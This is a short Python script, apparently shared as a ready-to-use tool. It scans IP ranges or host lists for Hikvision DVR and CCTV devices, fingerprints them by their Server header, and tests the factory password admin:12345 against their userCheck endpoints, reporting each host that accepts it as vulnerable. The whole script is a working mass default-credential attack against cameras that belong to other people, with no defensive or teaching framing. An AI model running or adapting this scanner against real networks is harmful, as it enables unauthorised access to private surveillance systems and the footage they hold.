Hikvision CCTV Default Password Finder

1. #!/usr/bin/python3
2. # -*- coding: utf-8- -*-
3. """
4. Hikvision DVR scanner
5.  
6. Autor: SQS
7. """
8. R="\033[31m" #Red color
9. O="\033[33m" #Yellow color
10. W="\033[37m" #White color
11.  
12. import os, sys
13. import urllib.request, urllib.error, urllib.parse, base64
14. from netaddr import *
15.  
16. try:
17. urls = sys.argv[1]
18. except:
19. print("Usage: ./CCTVpwn.py 10.0.0.0/24, 192.168.0.0/16 or iplist.txt\n " )
20. sys.exit()
21.  
22. Headers = {"DNVRS-Webs" : "/ISAPI/Security/userCheck", \
23. "Hikvision-Webs" : "/PSIA/Custom/SelfExt/userCheck", \
24. "DVRDVS-Webs" : "/PSIA/Custom/SelfExt/userCheck"\
25.  
26. }
27.  
28. def attack(page, url):
29. encodedstring = base64.encodestring(b"admin:12345")[:-1]
30. auth = "Basic %s" % encodedstring.decode('utf-8')
31. req = urllib.request.Request(page, None, {"Authorization": auth })
32. handle = urllib.request.urlopen(req)
33. s=handle.read()
34. if b'200' in s:
35. print (R+"[+] "+url+ " is vuln: user - admin, pass - 12345")
36. else:
37. print (O+"[-] "+url+ " is not vuln")
38.  
39. def stdy(urls):
40. for r in IPNetwork(urls):
41. try:
42. url="http://"+str(r)
43. res=urllib.request.urlopen(url,timeout=0.1).info()
44. header=dict(res)["Server"]
45. page = url + Headers[header]
46. attack(page, url)
47. except KeyboardInterrupt:
48. print(W + "\nPressed Ctrl+C")
49. sys.exit()
50. except:
51. pass
52.  
53. if (os.path.isfile(urls) == True):
54. with open(urls, "r") as ins:
55. array = []
56. for line in ins:
57. stdy(line)
58. else:
59. stdy(urls)